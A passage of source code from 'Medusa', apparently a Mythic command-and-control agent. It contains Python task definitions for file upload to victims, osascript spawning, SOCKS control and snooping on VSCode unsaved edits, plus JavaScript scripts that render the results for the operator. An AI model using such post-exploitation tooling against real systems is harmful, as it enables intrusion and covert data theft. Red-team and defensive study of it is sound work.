response.DisplayParams = "Stopped SOCKS5 server on port {}".format(taskData.args.get_arg("port")) return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/spawn_jxa.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json import sys import base64 class SpawnJxaArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="file", type=ParameterType.File, description="Script file to load" ), CommandParameter( name="language", type=ParameterType.ChooseOne, choices=[ "JavaScript", "AppleScript" ], default_value="JavaScript", description="Language of script to load" ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: raise ValueError("Missing JSON arguments") else: raise ValueError("Missing arguments") class SpawnJxaCommand(CommandBase): cmd = "spawn_jxa" needs_admin = False help_cmd = "spawn_jxa" description = ( "Spawn an osascript process and pipe script content to it." ) version = 1 author = "@ajpc500" attackmapping = [] argument_class = SpawnJxaArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: file_resp = await MythicRPC().execute( "get_file", task_id=task.id, file_id=task.args.get_arg("file"), get_contents=False ) if file_resp.status == MythicStatus.Success: original_file_name = file_resp.response[0]["filename"] task.display_params = f"Spawning osascript and loading script: {original_file_name}" else: raise Exception("Failed to register file: " + file_resp.error) file_resp = await MythicRPC().execute("update_file", file_id=task.args.get_arg("file"), delete_after_fetch=True, comment="Uploaded and piped to new osascript process") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/unload.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json, base64, os class UnloadArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="command", type=ParameterType.ChooseOne, description="Command to unload from the agent", choices_are_all_commands=True, choices_are_loaded_commands=True ) ] async def parse_arguments(self): if self.command_line[0] != "{": self.add_arg("command", self.command_line) else: self.load_args_from_json_string(self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class UnloadCommand(CommandBase): cmd = "unload" needs_admin = False help_cmd = "unload cmd" description = "This unloads an existing function from a callback." version = 1 author = "@ajpc500" parameters = [] attackmapping = ["T1030", "T1129"] argument_class = UnloadArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse: response = PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) unload_cmd = taskData.args.get_arg("command") response.DisplayParams = f"command: {unload_cmd}" return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/unload_module.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json import sys import base64 class UnloadModuleArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="module_name", type=ParameterType.String, description="Name of module to load, e.g. cryptography" ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: self.add_arg("module_name", self.command_line) else: raise ValueError("Missing arguments") class UnloadModuleCommand(CommandBase): cmd = "unload_module" needs_admin = False help_cmd = "unload_module [module]" description = ( "Unload an in-memory Python module from the agent" ) version = 1 author = "@ajpc500" attackmapping = [] argument_class = UnloadModuleArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = f"Unloading {task.args.get_arg('module_name')} module" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/upload.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json, sys, base64 class UploadArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="file", type=ParameterType.File, description="file to upload" ), CommandParameter( name="remote_path", type=ParameterType.String, description="/remote/path/on/victim.txt", ), ] async def parse_arguments(self): if len(self.command_line) == 0: raise ValueError("Must supply arguments") raise ValueError("Must supply named arguments or use the modal") async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class UploadCommand(CommandBase): cmd = "upload" needs_admin = False help_cmd = "upload" description = ( "Upload a file to the target machine by selecting a file from your computer. " ) version = 1 supported_ui_features = ["file_browser:upload"] author = "@its_a_feature_" attackmapping = ["T1132", "T1030", "T1105"] argument_class = UploadArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse: response = MythicCommandBase.PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) try: file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage( TaskID=taskData.Task.ID, AgentFileID=taskData.args.get_arg("file") )) if file_resp.Success: if len(file_resp.Files) > 0: original_file_name = file_resp.Files[0].Filename if len(taskData.args.get_arg("remote_path")) == 0: taskData.args.add_arg("remote_path", original_file_name) elif taskData.args.get_arg("remote_path")[-1] == "/": taskData.args.add_arg("remote_path", taskData.args.get_arg("remote_path") + original_file_name) response.DisplayParams = f"{original_file_name} to {taskData.args.get_arg('remote_path')}" else: raise Exception("Failed to find that file") else: raise Exception("Error from Mythic trying to get file: " + str(file_resp.Error)) except Exception as e: raise Exception("Error from Mythic: " + str(sys.exc_info()[-1].tb_lineno) + " : " + str(e)) return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/vscode_list_recent.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class VscodeListRecentArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="db", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=False )], default_value="", description="Path to VSCode state database", ) ] async def parse_arguments(self): if len(self.command_line) > 0: self.add_arg("db", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class VscodeListRecentCommand(CommandBase): cmd = "vscode_list_recent" needs_admin = False help_cmd = "vscode_list_recent [state_db_path]" description = "Lists recently accessed files/folders in VSCode state database" version = 1 author = "@ajpc500" attackmapping = [] supported_ui_features = [] argument_class = VscodeListRecentArguments browser_script = BrowserScript(script_name="vscode_recent", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[ SupportedOS.MacOS ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: if task.args.get_arg("db"): task.display_params = "Listing recent VSCode files from state database at " + task.args.get_arg("db") else: task.display_params = "Listing recent VSCode files from state database at '~/Library/Application Support/Code/User/globalStorage/state.vscdb'" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/vscode_open_edits.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class VscodeOpenEditsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="backups_path", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=False )], default_value="", description="Path to VSCode backups directory", ) ] async def parse_arguments(self): if len(self.command_line) > 0: self.add_arg("backups_path", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class VscodeOpenEditsCommand(CommandBase): cmd = "vscode_open_edits" needs_admin = False help_cmd = "vscode_open_edits [backups_dir_path]" description = "Lists edited files in VSCode that have not been saved." version = 1 author = "@ajpc500" attackmapping = [] supported_ui_features = [] argument_class = VscodeOpenEditsArguments browser_script = BrowserScript(script_name="vscode_edits", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[ SupportedOS.MacOS ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: if task.args.get_arg("backups_path"): task.display_params = "Listing edited and unsaved files in VSCode from backup directory: " + task.args.get_arg("backups_path") else: task.display_params = "Listing edited and unsaved files in VSCode from backup directory: '~/Library/Application Support/Code/Backups'" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/vscode_watch_edits.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class VscodeWatchEditsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="backups_path", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=False )], description="Path of VSCode backups folder ", ), CommandParameter( name="seconds", type=ParameterType.Number, parameter_group_info=[ParameterGroupInfo( required=False )], default_value=60, description="Seconds to wait between polling directory for changes", ) ] async def parse_arguments(self): if self.command_line[0] != "{": pieces = self.command_line.split(" ") if len(pieces) == 2: self.add_arg("backups_path", pieces[0]) self.add_arg("seconds", pieces[1]) else: raise Exception("Wrong number of parameters, should be 2") else: self.load_args_from_json_string(self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class VscodeWatchEditsCommand(CommandBase): cmd = "vscode_watch_edits" needs_admin = False help_cmd = "vscode_watch_edits [/path/to/backups/dir]" description = "Poll VSCode backups directory for unsaved edits" version = 1 author = "@ajpc500" attackmapping = ["T1083"] argument_class = VscodeWatchEditsArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS], ) async def create_tasking(self, task: MythicTask) -> MythicTask: if task.args.get_arg("backups_path"): task.display_params = "Watching for VSCode edits. Polling '{}' for changes every {} seconds".format(task.args.get_arg("backups_path"), str(task.args.get_arg("seconds"))) else: task.display_params = "Watching for VSCode edits. Polling '{}' for changes every {} seconds".format("~/Library/Application Support/Code/Backups", str(task.args.get_arg("seconds"))) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/watch_dir.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class WatchDirArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True )], description="Path of folder on the current system to watch", ), CommandParameter( name="seconds", type=ParameterType.Number, parameter_group_info=[ParameterGroupInfo( required=False )], default_value=60, description="Seconds to wait between polling directory for changes", ) ] async def parse_arguments(self): if self.command_line[0] != "{": pieces = self.command_line.split(" ") if len(pieces) == 2: self.add_arg("path", pieces[0]) self.add_arg("seconds", pieces[1]) else: raise Exception("Wrong number of parameters, should be 2") else: self.load_args_from_json_string(self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class WatchDirCommand(CommandBase): cmd = "watch_dir" needs_admin = False help_cmd = "watch_dir [/path/to/file]" description = "Poll a directory for changes" version = 1 author = "@ajpc500" attackmapping = ["T1083"] argument_class = WatchDirArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Polling {} for changes every {} seconds".format(task.args.get_arg("path"), str(task.args.get_arg("seconds"))) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/copy_additional_info_to_clipboard.js ================================================ function(elem){ function copyStringToClipboard(str) { // Create new element let el = document.createElement('textarea'); // Set value (string to be copied) el.value = str; // Set non-editable to avoid focus and move outside of view el.setAttribute('readonly', ''); el.style = {position: 'absolute', left: '-9999px'}; document.body.appendChild(el); // Select text inside element el.select(); // Copy text to clipboard document.execCommand('copy'); // Remove temporary element document.body.removeChild(el); alertTop("info", "Copied...", 1); } var content = atob(elem.getAttribute("additional-info")); copyStringToClipboard(content); } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/create_table.js ================================================ function(headers, data){ let output = ""; output += ""; for(let i = 0; i < headers.length; i++){ output += ""; } output += ""; for(let i = 0; i < data.length; i++){ output += ""; for(let j = 0; j < headers.length; j++){ if(data[i]['cell-style'].hasOwnProperty(headers[j])){ output += ""; } else{ output += ""; } } output += ""; } output += "
" + headers[i]['name'].toUpperCase() + "
" + data[i][headers[j]['name']] + "" + data[i][headers[j]['name']] + "
"; return output; } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/download.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); return {"download":[{ "agent_file_id": data["agent_file_id"], "variant": "contained", "name": "Download " + task["display_params"] }]}; }catch(error){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else if(task.status === "processed"){ if(responses.length > 0){ const task_data = JSON.parse(responses[0]); return {"plaintext": "Downloading file with " + task_data["total_chunks"] + " total chunks..."}; } return {"plaintext": "No data yet..."} }else{ // this means we shouldn't have any output return {"plaintext": "No response yet from agent..."} } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/download_bulk.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } else if(task.completed){ if(responses.length === 0){ return {'plaintext': 'No response from agent.'}; } // Iterative mode returns one JSON object per file, one per line. // Archive mode returns a single JSON object with agent_file_id. const lines = responses[0].split('\n').filter(l => l.trim().length > 0); let downloads = []; let plainLines = []; for(let i = 0; i < lines.length; i++){ try{ let data = JSON.parse(lines[i].replace((new RegExp("'", 'g')), '"')); if("agent_file_id" in data){ let label = "file_path" in data ? "Download " + data["file_path"] : "Download " + task["display_params"]; downloads.push({ "agent_file_id": data["agent_file_id"], "variant": "contained", "name": label }); } else { plainLines.push(lines[i]); } } catch(error){ plainLines.push(lines[i]); } } if(downloads.length > 0){ let result = {"download": downloads}; if(plainLines.length > 0){ result["plaintext"] = plainLines.join('\n'); } return result; } return {'plaintext': responses[0]}; } else if(task.status === "processed"){ if(responses.length > 0){ try{ const task_data = JSON.parse(responses[0]); if("total_chunks" in task_data){ return {"plaintext": "Downloading with " + task_data["total_chunks"] + " total chunks..."}; } } catch(error){} return {"plaintext": responses[0]}; } return {"plaintext": "No data yet..."}; } else { return {"plaintext": "No response yet from agent..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/file_size_to_human_readable_string.js ================================================ function(fileSize){ var thresh = 1024; if(Math.abs(fileSize) < thresh) { return fileSize + ' B'; } var units = ['KB','MB','GB','TB','PB','EB','ZB','YB']; var u = -1; do { fileSize /= thresh; ++u; } while(Math.abs(fileSize) >= thresh && u < units.length - 1); return fileSize.toFixed(1)+' '+units[u]; return output; } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/jobs.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length > 0){ try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["jobs"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "command":{"plaintext": entries[i][0]}, "task_id": {"plaintext": entries[i][1], "copyIcon": true}, "rowStyle": {"backgroundColor": "mediumpurple"} }) } return { "table": [ { "headers": [ {"plaintext": "command", "type": "string", "fillWidth": true}, {"plaintext": "task_id", "type": "string", "fillWidth": true}, ], "rows": output_table, "title": "Running Jobs" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/list_apps.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["apps"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "PID":{"plaintext": entries[i]["pid"]}, "Name":{"plaintext": entries[i]["name"]}, "Executable URL":{"plaintext": entries[i]["exec_url"], "copyIcon": true}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "PID", "type": "string"}, {"plaintext": "Name", "type": "string","width": 180}, {"plaintext": "Executable URL", "type": "string"}, ], "rows": output_table, "title": "Apps" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/list_dlls.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["dlls"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "DLL":{"plaintext": entries[i], "copyIcon": true}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "DLL", "type": "string"}, ], "rows": output_table, "title": "Loaded DLLs" } ] } }catch(error){ console.log(error); const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/ls.js ================================================ function(task, response){ if(task.status.includes("error")){ const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed && response.length > 0){ // tables styles let folder = { backgroundColor: "mediumpurple", color: "white" }; let file = {}; var archiveFormats = [".a",".ar",".cpio",".shar",".LBR",".lbr",".mar",".sbx",".tar",".bz2",".F",".gz",".lz",".lz4",".lzma",".lzo",".rz",".sfark",".sz",".?Q?",".?Z?",".xz",".z",".Z",".zst",".??",".7z",".s7z",".ace",".afa",".alz",".apk",".arc",".arc",".arj",".b1",".b6z",".ba",".bh",".cab",".car",".cfs",".cpt",".dar",".dd",".dgc",".ear",".gca",".ha",".hki",".ice",".jar",".kgb",".lzh",".lzx",".pak",".pak",".parti",".paq6",".pea",".pim",".pit",".qda",".rar",".rk",".sda",".sea",".sen",".sfx",".shk",".sit",".sitx",".sqx",".tar",".tbz2",".uc",".uca",".uha",".war",".wim",".xar",".xp3",".yz1",".zip",".zoo",".zpaq",".zz",".ecc",".ecsbx",".par",".par2",".rev"]; var diskImages = [".dmg", ".iso", ".vmdk"]; var wordDocs = [".doc", ".docx", ".dotm", ".dot", ".wbk", ".docm", ".dotx", ".docb"]; var excelDocs = [".xls", ".xlsx", ".xlsm", ".xltx", ".xltm", ".xlmx", ".xlmt"]; var powerPoint = [".ppt", ".pptx", ".potx", ".ppsx", ".thmx", ".pot", ".pps"]; var pdfExt = [".pdf"]; var dbExt = [".db", ".sql", ".psql"]; var keyFiles = [".pem", ".ppk"]; var scriptFiles = [".config", ".ps1", ".psm1", ".psd1", ".vbs", ".js", ".py", ".pl", ".rb", ".go", ".xml", ".html", ".css", ".sh", ".bash", ".yaml", ".yml"]; // var uniqueName = task.id + "_additional_permission_info_modal"; let rows = []; let data = ""; try{ data = JSON.parse(response[0]); }catch(error){ const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } let headers = [ {"plaintext": "name", "type": "string", "fillWidth": true}, {"plaintext": "size", "type": "size", "width": 185}, {"plaintext": "last_accessed", "type": "string", "width": 285}, {"plaintext": "last_modified", "type": "string", "width": 285}, {"plaintext": "actions", "type": "button", "width": 90, "disableSort": true}, ]; for(let i = 0; i < data["files"].length; i++){ let ls_path = ""; let sep = data["parent_path"].includes("/") ? "/": "\\"; if(data["parent_path"] === "/"){ ls_path = data["parent_path"] + data["name"] + sep + data["files"][i]["name"]; }else{ ls_path = data["parent_path"] + sep + data["name"] + sep + data["files"][i]["name"]; } var icon = ""; if (data["files"][i]["is_file"] === true) { var fileExt = "." + data["files"][i]['name'].split(".").slice(-1)[0].toLowerCase(); if (archiveFormats.includes(fileExt)) { icon = 'archive/zip'; } else if (diskImages.includes(fileExt)) { icon = 'diskimage'; } else if (wordDocs.includes(fileExt)) { icon = 'word'; } else if (excelDocs.includes(fileExt)){ icon = 'excel'; } else if (powerPoint.includes(fileExt)) { icon = 'powerpoint'; } else if (pdfExt.includes(fileExt)){ icon = 'pdf/adobe'; } else if (dbExt.includes(fileExt)) { icon = 'database'; } else if (keyFiles.includes(fileExt)) { icon = 'key'; } else if (scriptFiles.includes(fileExt)) { icon = 'code/source'; } else { icon = 'code/source'; } } else { icon = 'closedFolder'; } let row = { "rowStyle": data["files"][i]["is_file"] ? file: folder, "name": { "plaintext": data["files"][i]["name"], "startIcon": icon }, "size": {"plaintext": String(data["files"][i]["size"])}, "last_accessed": {"plaintext": String(new Date(data["files"][i]["access_time"]))}, "last_modified": {"plaintext": String(new Date(data["files"][i]["modify_time"]))}, "actions": {"button": { "name": "Actions", "type": "menu", "value": [ { "name": "View XATTRs", "type": "dictionary", "value": data["files"][i]["permissions"], "leftColumnTitle": "XATTR", "rightColumnTitle": "Values", "title": "Viewing XATTRs" }, { "name": "LS Path", "type": "task", "ui_feature": "file_browser:list", "parameters": ls_path }, { "name": "Download File", "type": "task", "disabled": !data["files"][i]["is_file"], "ui_feature": "file_browser:download", "parameters": ls_path } ] }} }; rows.push(row); } return {"table":[{ "headers": headers, "rows": rows, "title": "File Listing Data" }]}; } else if(task.status === "processed"){ // this means we're still downloading return {"plaintext": "Only have partial data so far..."} }else{ // this means we shouldn't have any output return {"plaintext": "Not response yet from agent..."} } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/ps.js ================================================ function(task, response){ if(task.status.includes("error")){ const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(response.length > 0){ try{ let data = JSON.parse(response[0]); let entries = data["processes"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "UID":{"plaintext": (!"user_id" in entries[i]) ? ' ' : entries[i]['user_id'] }, "PID":{"plaintext": String(entries[i]["process_id"]) }, "PPID":{"plaintext": ((!"parent_process_id" in entries[i]) ? ' ' : entries[i]['parent_process_id']) }, "Name":{"plaintext": ((!"name" in entries[i]) ? ' ' : entries[i]['name']) }, "Arch":{"plaintext": ((!"architecture" in entries[i]) ? ' ' : entries[i]['architecture']) }, "Bin Path":{"plaintext": ((!"bin_path" in entries[i]) ? ' ' : entries[i]['bin_path']) }, "actions": {"button": { "name": "Actions", "type": "menu", "value": [ { "name": "List DLLs", "type": "task", "ui_feature": "process_dlls:list", "parameters": { "process_id": entries[i]["process_id"] } }, ] }}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "UID", "type": "string","width": 90,"disableSort": true}, {"plaintext": "PID", "type": "string","width": 90,"disableSort": true}, {"plaintext": "PPID", "type": "string","width": 90,"disableSort": true}, {"plaintext": "Name", "type": "string", "fillWidth": true}, {"plaintext": "Arch", "type": "string", "width": 70}, {"plaintext": "Bin Path", "type": "string", "fillWidth": true}, {"plaintext": "actions", "type": "button", "width": 90, "disableSort": true}, ], "rows": output_table, "title": "Running processes" } ] } }catch(error){ console.log(error); const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/ps_full.js ================================================ function(task, response){ if(task.status.includes("error")){ const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(response.length > 0){ try{ let data = JSON.parse(response[0]); let entries = data["processes"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "PID":{"plaintext": String(entries[i]["process_id"]), "copyIcon": true}, "PPID":{"plaintext": ((!entries[i].hasOwnProperty("parent_process_id")) ? ' ' : String(entries[i]['parent_process_id'])) }, "Name":{"plaintext": ((!"name" in entries[i]) ? ' ' : entries[i]['name']) }, "Arch":{"plaintext": ((!"architecture" in entries[i]) ? ' ' : entries[i]['architecture']) }, "Integrity Level":{"plaintext": ((!entries[i].hasOwnProperty("integrity_level")) ? ' ' : String(entries[i]['integrity_level'])) }, "Command Line":{"plaintext": ((!"command_line" in entries[i]) ? ' ' : entries[i]['command_line']) }, "Bin Path":{"plaintext": ((!"bin_path" in entries[i]) ? ' ' : entries[i]['bin_path']), "copyIcon": true}, "actions": {"button": { "name": "Actions", "type": "menu", "value": [ { "name": "List DLLs", "type": "task", "ui_feature": "process_dlls:list", "parameters": { "process_id": String(entries[i]["process_id"]) } }, { "name": "View Details", "type": "dictionary", "value": entries[i], "leftColumnTitle": "Field", "rightColumnTitle": "Value", "title": "Viewing All Data" }, ] }}, "rowStyle": {} }) } return { "table": [ { "headers": [ {"plaintext": "PID", "type": "string","width": 90,"disableSort": true}, {"plaintext": "PPID", "type": "string", "width": 90,"disableSort": true}, {"plaintext": "Name", "type": "string", "fillWidth": true}, {"plaintext": "Arch", "type": "string", "width": 70}, {"plaintext": "Integrity Level", "type": "string", "width": 70}, {"plaintext": "Command Line", "type": "string", "fillWidth": true}, {"plaintext": "Bin Path", "type": "string", "fillWidth": true}, {"plaintext": "actions", "type": "button", "width": 90, "disableSort": true}, ], "rows": output_table, "title": "Running processes" } ] } }catch(error){ console.log(error); const combined = response.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else{ return {"plaintext": "No output from command"}; } }else{ return {"plaintext": "No data to display..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/screenshot.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length > 0){ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); return {"screenshot":[{ "agent_file_id": data["file_id"], "variant": "contained", "name": "View Screenshot" }]}; }else{ return {"plaintext": "No data to display..."} } }else if(task.status === "processed"){ // this means we're still downloading if(responses.length > 0){ let data = JSON.parse(responses[0]); return {"screenshot":[{ "agent_file_id": data["file_id"], "variant": "contained", "name": "View Partial Screenshot" }]}; } return {"plaintext": "No data yet..."} }else{ // this means we shouldn't have any output return {"plaintext": "Not response yet from agent..."} } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/tcc.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length == 1){ var auth_values = [ "Access Denied", "Unknown", "Allowed", "Limited" ]; var auth_reason = [ "Error", "User Consent", "User Set", "System Set", "Service Policy", "MDM Policy", "Override Policy", "Missing usage string", "Prompt Timeout", "Preflight Unknown", "Entitled", "App Type Policy", ]; var client_type = [ "Bundle Identifier", "Absolute Path" ]; try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["tcc"]; let output_table = []; for(let i = 0; i < entries.length; i++){ let clienttype = client_type[entries[i]['client_type']]; let authval = auth_values[entries[i]['auth_value']]; let authres = auth_reason[entries[i]['auth_reason']]; output_table.push({ "Client":{"plaintext": entries[i]["client"]}, "Service":{"plaintext": entries[i]["service"]}, "Client Type": { "plaintext": clienttype }, "Auth Value": { "plaintext": authval }, "Auth Reason": { "plaintext": authres }, "Last 